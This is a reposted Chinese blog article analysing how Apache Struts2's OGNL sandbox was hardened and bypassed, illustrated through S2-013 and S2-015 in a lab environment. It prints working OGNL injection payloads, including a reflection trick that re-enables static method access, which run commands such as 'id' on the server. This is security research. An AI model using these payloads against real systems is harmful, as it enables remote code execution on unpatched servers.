转载

浅谈struts2漏洞防护与绕过-上

这篇文章的重点不在于分析漏洞,而是通过漏洞去分析struts2沙箱的防护以及绕过,注意本文的struts2的版本范围与漏洞影响的范围是不对应的,只是顺序问题。

然后本文环境是使用的kingkk师傅仓库的 https://github.com/kingkaki/Struts2-Vulenv/tree/master/S2-015

s2-013

payload

${(#_memberAccess["allowStaticMethodAccess"]=true).(@java.lang.Runtime@getRuntime().exec('open /Applications/Calculator.app'))}

这个漏洞的调用堆栈是这样的

浅谈struts2漏洞防护与绕过-上

这个洞的原因呢是struts2的标签中 <s:a><s:url> 都有一个 includeParams 属性,这个属性可以设置为 

none - include no parameters in the URL (default)
get - include only GET parameters in the URL
all - include both GET and POST parameters in the URL

问题出现于这种标签解析的过程注入了OGNL表达式,当为 all 的时候payload可以get和post,当为get的时候只能利用get请求触发,当为none的时候不会触发。

struts2-2.3.14.1之前

在一开始我们关注 allowStaticMethodAccess ,因为它默认为false,阻止了我们去调用静态方法, SecurityMemberAccess 类中定义了这些操作,然后它继承自 DefaultMemberAccess

浅谈struts2漏洞防护与绕过-上

我们再来了解下什么是 _memberAccess ,在OgnlContext包里面

浅谈struts2漏洞防护与绕过-上

然后可以看到调用到

public class DefaultMemberAccess
  implements MemberAccess
{
  public boolean allowPrivateAccess = false;
  public boolean allowProtectedAccess = false;
  public boolean allowPackageProtectedAccess = false;

  public DefaultMemberAccess(boolean allowAllAccess)
  {
    this(allowAllAccess, allowAllAccess, allowAllAccess);
  }

  public DefaultMemberAccess(boolean allowPrivateAccess, boolean allowProtectedAccess, boolean allowPackageProtectedAccess)
  {
    this.allowPrivateAccess = allowPrivateAccess;
    this.allowProtectedAccess = allowProtectedAccess;
    this.allowPackageProtectedAccess = allowPackageProtectedAccess;
  }

明显看出这里控制能访问哪些函数,然后有个地方我没有调试清楚 _memberAccessSecurityMemberAccess 之间是如何是建立起共享属性的,文章 https://paper.seebug.org/794/#32-struts-2320 写了调试的过程。

但是我们可以知道通过ongl调用全局属性 _memberAccess 来修改掉 allowStaticMethodAccess ,那么我们就可以去调用类静态方法。

对于s2-013来说,payload如下

${(#_memberAccess["allowStaticMethodAccess"]=true).(@java.lang.Runtime@getRuntime().exec('open /Applications/Calculator.app'))}

S2-015

payload

${#context['xwork.MethodAccessor.denyMethodExecution']=false,#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action

这个漏洞产生于在配置文件中,配置了action通配符为 * ,并且动态解析的时候,内容作为OGNL注入了 

<package name="S2-015" extends="struts-default">
    <action name="*" class="com.demo.action.PageAction">
        <result>/{1}.jsp</result>
    </action>
</package>

这个配置可以让我访问 * 的时候去访问对应的jsp页面

浅谈struts2漏洞防护与绕过-上

漏洞就出在了跳转jsp页面的动态解析过程,看下调用堆栈

浅谈struts2漏洞防护与绕过-上

然后不细讲了,看一下关键部分即可,在 struts2-core-2.3.14.2.jar!/org/apache/struts2/dispatcher/StrutsResultSupport.class 

public void execute(ActionInvocation invocation) throws Exception {
        this.lastFinalLocation = this.conditionalParse(this.location, invocation);
        this.doExecute(this.lastFinalLocation, invocation);
    }

浅谈struts2漏洞防护与绕过-上

这里是初步处理完的跳转,然后进入 conditionalParse 方法进行二次处理

在后面我们看到熟悉的处理函数

浅谈struts2漏洞防护与绕过-上

然后经过熟悉的格式处理到达

浅谈struts2漏洞防护与绕过-上

RCE了,大概漏洞流程是这样,重点还是分析沙箱的绕过。

struts2-2.3.14.1-struts2-2.3.20

在到版本 struts2-2.3.14.2 时,看diff

浅谈struts2漏洞防护与绕过-上

将allowStaticMethodAccess添加了 final 修饰符,删除了 setAllowStaticMethodAccess 没办法直接修改了,那么如何如何绕过呢,看网上的payload 

${#context['xwork.MethodAccessor.denyMethodExecution']=false,#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action

在我测试过程中发现 xwork.MethodAccessor.denyMethodExecution 本来就是false,所以payload为 

${#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action

浅谈struts2漏洞防护与绕过-上

这个思路是利用反射机制去调用和操作私有域和方法,详情看文章 https://www.cnblogs.com/ixenos/p/5699420.html ,然后突破了final,然后后面就是构造的回显了

浅谈struts2漏洞防护与绕过-上 

output: 123

浅谈struts2漏洞防护与绕过-上

参考:

https://paper.seebug.org/794/#32-struts-2320
https://www.anquanke.com/post/id/161690
https://blog.semmle.com/ognl-apache-struts-exploit-CVE-2018-11776/
http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities/#S2-015
原文  https://xz.aliyun.com/t/5627
正文到此结束
所属分类: 编程技术 Java

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
Java入门教程 bootstrap3 CSS springboot-demo Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 Struts2教程 MongoDB教程 Redis教程 Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 SpringCloud ANTLR教程 Hive教程 java实例教程 Ant教程 Hazelcast教程 Elastic-Job-Lite XStream教程 深入浅出MyBatis SVN教程 ibaties教程 rabittmq教程 WebService CXF学习 Hadoop教程 solr教程 JPA教程 ActiveMQ中文指南 Java内存模型 dubbo教程 Linux入门视频教程
近期评论
  1. 1 Spring Boot集成Spring Session快速入门Demo
  2. 2 Spring Boot集成RabbitMQ快速入门Demo
  3. 3 Spring Boot集成Quartz快速入门Demo
  4. 4 Spring Boot集成Mybatis Plus快速入门Demo
  5. 5 Spring Boot集成zipkin快速入门Demo
  6. 6 能用365块大洋去解决的事,千万不要用时间
  7. 7 Spring Boot集成atomikos快速入门Demo
  8. 8 Spring Boot集成fastdfs快速入门Demo
  9. 9 Spring Boot集成Https快速入门Demo
  10. 10 Spring Boot集成easypoi快速入门Demo
网站信息
  • 文章总数:155,463 篇
  • 文件总数:468,744 个
  • 标签总数:2,266 个
  • 分类总数:90 个
  • 留言数量:2,542 条
  • 在线人数:620 人
  • 运行天数:4,197天
  • 最后更新:2024年04月24日00点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG